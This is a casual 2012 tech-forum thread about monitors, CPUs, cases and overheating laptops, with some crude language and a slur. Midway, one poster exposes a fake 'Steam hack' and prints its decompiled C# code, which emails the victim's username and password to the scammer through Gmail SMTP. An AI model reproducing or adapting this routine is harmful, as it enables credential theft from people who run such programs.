Oh please, it's completely clean, you can put up with some chesthair.
Would you want your boss seeing you looking at that?
Fuck yesss fucking finally!!!@! If you hadn't noticed, I'm excited because my PI is being shipped.
Mine seems to be coming this August.
I don't mind some free boxes, but thanks!
You should go on vacation, I'll watch the house for you Anyway, just got a phone call from my friend who was mad that the steam sale hadn't started yet. Anyway, apparently his friend "works for THQ now, developing GTAV part time". He is going to set up the friend I was talking to with "an interview with Valve". Keep in mind that this kid can barely program java and uses UDK.
rip
what happened
Oh man I just realized that I don't even have space for one modern graphics card in my current case because the hard drives are overtaking at like 225mm. Guess I'll move one of them to 5,25" till I find a good case.
No, the T221 isn't expensive because of the most unique panel ever made, no it's not expensive because of it's rarity, no, none of that. It's because of the DVI link mechanism. Makes sense.
One of the reasons. One of them. As in, less than all of them. You know, more than one part goes into a monitor.
Just got Synergy working between my desktop and my laptop its pretty cool
what happened

One of the reasons. One of them. As in, less than all of them. You know, more than one part goes into a monitor.
Do you actually know the system it uses? The dvi link system is by far one of the cheaper systems of it.
TeraCopy is so awesome for huge transfers, yet so awful for lots of semi-large files like music I don't know if it's me or not but it's making me want to move back
Do you actually know the system it uses? The dvi link system is by far one of the cheaper systems of it.
Honestly, no, I was just reading a post on a forum about overclocking the refresh rate and they mentioned a 'rediculously[sic] powerful processor inside', so I toned it down to fairly. Guess that's what I get for making assumptions.
A bad habit, comrade. The thing's expensive because of that... epic panel and it's rarity.
Well I still want one, I think that 55 hertz is perfectly fine when you normally have a 60Hz monitor, and that resolution.... I shall make it my life's goal to acquire that monitor's DG5 version.
His reason for buying a terrible Bulldozer was basically "i bought it because i want to use something that's not intel for once herp derp", despite the fact that everyone was telling him how terrible it was.
In fairness, he said right from the beginning that he wanted AMD, and you all kept giving him Intel suggestions. He's still a dumbass for going with Bulldozer, but you didn't actually tell him about any of the good AMD procs.
And I found another skiddie who got caught in my eyes just like Camcole1. Just this time he is an estonian and a retard. He made a STEAM HACK program. They advertised it as: Put in your Username and Password, press a button and get all the gaymes on Steam. All it does is actually get the username and pw and sends it to his email. Email and PW are in the program. Let's try logging into the user? Can't. The password is changed. The program won't now function like they wanted probably. Meaning, it won't send the email.
{ this.RichTextBox1.Text = "Kasutajanimi: " + this.TextBox1.Text + " Parool: " + this.TextBox2.Text; MailMessage mailMessage = new MailMessage(); new SmtpClient { Credentials = new NetworkCredential("[REDACTED]@gmail.com", "[REDACTED]"), Host = "smtp.gmail.com", Port = 587, EnableSsl = true }.Send(new MailMessage { From = new MailAddress("[REDACTED]@gmail.com"), To = { "[REDACTED]@gmail.com" }, Subject = "[Hackitud] ", Body = this.RichTextBox1.Text }); this.Close(); } }

More info. File deleted from the upload site, Youtube account deleted, GMail account deleted, GMail recovery EMail account deleted / didn't exist. Dunno what to think about it now. Awesome, I could probably get that kid arrested if I want to mess more with it but effort.
And finally the mother of all terminology mistakes (In my limited experience): Christmas 2007 a lady walks up to my coworker with a long, narrow box. She said to him "I have three kids and they each want an iPod. Would this work?" The label on the box said "tripod"...
i fucking died
i fucking died
good.
good.
thx bby [img]http://www.facepunch.com/fp/ratings/heart.png[/img] <3 <3 <3
Kinda like how Dell consumer laptops are terrible?
I have a Dell XPS Studio laptop and It's by far the best laptop I've ever had. Has an i5 2410 and a GT 525. But the main thing I like about it is the huge touchpad. I don't drag a mouse around because it's so good :v: Should maybe mention that I got it for free.
I'm assembling 2 powerful render machines based around i7 3770S's, should I livestream in terrible-laptop-webcam-o-vision? [editline]28th June 2012[/editline] Nevermind, there's construction going on and the jackhammers drown out me even trying to think

Vibrations are making it impossible to work, all the screws are in buckets now to keep them from rolling off the table and my head is now killing me.
I think the heat in this country is affecting my laptop :v: I've had to remove the HDD door as the drive was getting to 55 celcius.
Pepper;36540126']I think the heat in this country is affecting my laptop :v: I've had to remove the HDD door as the drive was getting to 55 celcius.
That's the standard operating temperature for a certain HP laptop running Windows Vista Home Basic. Fortunately, installing XP in its place fixed that swapping issue.
one of the ~~pro techs~~ at my school showed off his knowledge by disassembling one of the fancy ass computers for ADT and some server (or something, idunno). Whilst he was showing off the parts, he showed us one of the expensive and pretty cool electrothermic cooling pipe thingy, which basically takes heat from its cold side to the hot one. After showing off his ~pro skills~ he put the pipe back between the processor and the heatsink Upside down. A few hours later, when that computer was used, the processor's plastic melted and got +130C and released not only the magic smoke but presumably any pressumtions about that techs ~~pro skills~~
Wow, the Antec 300 really is quite the nice looking case. Just a classy monolithic black no frills tower.
Wow, the Antec 300 really is quite the nice looking case. Just a classy monolithic black no frills tower.
But at its price point it's horrendously outdated when it comes to features, especially cable management.
